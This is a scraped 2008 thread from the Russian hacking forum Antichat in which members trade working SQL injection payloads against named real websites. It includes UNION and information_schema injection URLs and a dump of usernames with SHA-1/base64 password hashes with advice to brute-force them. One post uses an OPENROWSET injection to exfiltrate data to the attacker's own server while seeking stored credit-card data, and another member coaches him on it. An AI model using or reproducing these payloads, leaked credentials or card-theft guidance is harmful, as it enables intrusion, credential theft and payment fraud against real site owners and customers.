ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.04.2008, 11:53
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
не подумал =)
|
|
|
25.04.2008, 16:07
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Передал параметру одного из сайтов -1+union+select+1,2,3,4,5--
Выдало ошибку : Microsoft OLE DB Provider for SQL Server error '80040e07'
Operand type clash: ntext is incompatible with int
/news/index.asp, line 20
Кроме как cast в голову ничё не приходит. Читал, что взломать можно только сайты с ошибками 80040e14(*идеальная ошибка*).Неужели это так? ( Так мало сайтов тогда уязвимы чтоли Ж(
Предварительно подобрал количество полей.
Да и вот ещё что : попадает ли под красивый запрос такая хрень ? :
Warning: mssql_query(): message: Conversion failed when converting the nvarchar value '-1 order by 1000--' to data type int. (severity 16) in *какой-то путь к скрипту* on line 17
Вот ещё ошибка при выборе из бд -
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'Òàê è æèâåì' to a column of data type int.
/index.asp, line 50
Как преобразовать нормально?)
Последний раз редактировалось Велемир; 25.04.2008 в 17:11..
|
|
|
|
25.04.2008, 16:50
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Сообщение от Doom123
Код:
https://www.lina2.ru/clans/index.php?showclan=-1+union+select+login,password+from+accounts/*
login  ass
парль зашифрован
base64_encode(pack('H*'sha1($apss)))
Схема БД(спасибо Scipio):
Код:
http://www.lina2.ru/clans/index.php?showclan=-268520741+union+select+concat(table_schema,0x3a,ta ble_name,0x3a,column_name),null+from+information_s chema.columns+where+table_schema+like+0x6C3225/*
Код HTML:
11099 PkdTSrZ22Jp9HBzYgkJ2yk8nEWI=
membel 9Qu39+nMMEM3kwc1Pb4882N3kt8=
koliaxtx O9yXyh2aY2gj2ExrnFhec93nGpE=
1401 lCOPqkIxlJ637ZxppwwLZ0r5JUA=
15valera15 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o=
16valera16 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o=
19630812 8I2BsLabPCh3DKL7U6z6dlRWfAM=
1lakosta1 hMCldvvsnfyE7bUkzRAIY7ks5R4=
1niger1 zSAcOz7JBqXyFEYnaa9qYyMgfQo=
2008 /D9xitkeYMLqfvGQ9NBpaPBSAPU=
777 /HpzTbpRjwMmCN/rBPTut58CWqc=
888 6qZ/OpPQrLCNil6P+YZvUZg7PDs=
999 r8l+oTH9fiaVqY7zQBNgj5fzTh0=
000 iu+wbEJuB6CmcaHiSItIWNaUpzA=
Вот тут ЛОгин --- ПАСС
Теоритечески можно узнать пароли ?
|
|
|
|
25.04.2008, 17:07
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
$a = base64_decode('iu+wbEJuB6CmcaHiSItIWNaUpzA=');
$b = unpack('H*',$a);
echo $b;
И нада брутить SHA-1 хэш
|
|
|
|
25.04.2008, 17:44
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar) ,2,3,4,5,6,7,8,9,10+from+information_schema.column s--
Хули не выходит  (( |
|
|
|
25.04.2008, 17:49
|
|
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900
Репутация:
17
|
|
Вопрос: есть шелл на 1 сайте.На том же сервере есть еще 2 сайта.Как к ним получить доступ(при помощи уже залитого шелла)?
|
|
|
|
25.04.2008, 17:52
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от Велемир
http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar) ,2,3,4,5,6,7,8,9,10+from+information_schema.column s--
Хули не выходит ((
http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES)--
https://forum.antichat.ru/thread30501.html
|
|
|
|
25.04.2008, 18:20
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.donland.ru/news.asp?Id=1+or+1=(select+top+1+author+from+ssf_f orums)--
Выводит какую-то абракадабру.
Вот все таблицы, которые присутствуют на сервере: ).
dtproperties','ssgb2_groups','ssgb2_messages'%20,' ssgb2_messageGroups'%20,'ssgb3_groups'%20,'ssbx_ba nners'%20,'ssbx_clickLogs'%20,'ssf_forums','ssf_fo rumGroups'%20,'ssbx_showLogs','ssf_groups','ssf_me ssages','ssgb0_groups','ssgb0_messageGroups','ssgb 0_messages','ssgb1_groups','ssgb1_messageGroups',' ssgb1_messages','ssgb3_messageGroups','ssgb3_messa ges'%20,'ssis_nodes','ssm_groups','ssm_mailGroups' ,'ssm_mails','ssn_newGroups','ssn_news','ssv_answe rs','ssv_groups','ssv_voteGroups','ssv_votes','sys constraints','syssegments'.
Есть папка admin,в которую нипонятно, что вводить))))).Сомневаюсь, что в какой-то из этих папок есть что-то вроде админ или юзер ))\
Имя выводится как 'Âñå1',и чтойта ? )
Последний раз редактировалось Велемир; 25.04.2008 в 19:31..
|
|
|
|
25.04.2008, 21:02
|
|
Новичок
Регистрация: 29.03.2008
Сообщений: 7
Провел на форуме:
78255
Репутация:
0
|
|
Здравствуйте!
Нашёл mssql-иньекцию в одном интернет-магазинчике.
Выборку данных оттуда произвожу добавлением в строку запроса подобной штуки:
;insert+into+openrowset('sqloledb','uid=user3000;p wd=pass3000;network=DBMSSOCN;Address=777.777.103.4 ','select+line+from+base3000..tbltest')+select+tab le_name+from+information_schema.tables;--
Таким образом получаю данные на свой сервак. Страница просто перезагружается, данные заливаются ко мне, ошибки не происходит. Все довольны.
В текущей базе есть таблица Orders. В не хранится картон, но есть колонка CCOrderID. Я предполагаю, что картон хранится в другой таблице.
При заказе и оплате картон поля с реквизитами карты передаются в ccorder.asp.
Есть базы данных с именем cybersales. Думаю карты там.
Запрос select+table_name+from+cybersales.information_sche ma.tables не выполняется. Не просто не выдаёт результат на мой сервер, а именно не выполняется. Об этом я сужу по тому, что мне выдаётся HTTP 500 - Internal server error:The page cannot be displayed. А когда запрос корректно выполняется, то просто происходит перезагрузка страницы.
Видимо у текущего пользователя нет прав на просморт бд cybersales.
Делаю запрос select+name+from+master..syslogins. Получаю все логины. Есть cybersalesuser.
Запрос select+password+from+master..sysxlogins выполняется но ничего не выдаёт на мой сервер.
Каковы мой дальнейшие действия? Хочется добраться до картона. Спасибо!
Последний раз редактировалось cyberia; 25.04.2008 в 21:07..
|
|
|
|
25.04.2008, 21:28
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация?  )
Вот так не бывает:
"cybersales.information_schema.tables"
information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables
Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА
Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для SQL~In[J]ecTi0n](/avatars/avatar51654.jpg?665573){kind=avatar}
Линейный вид
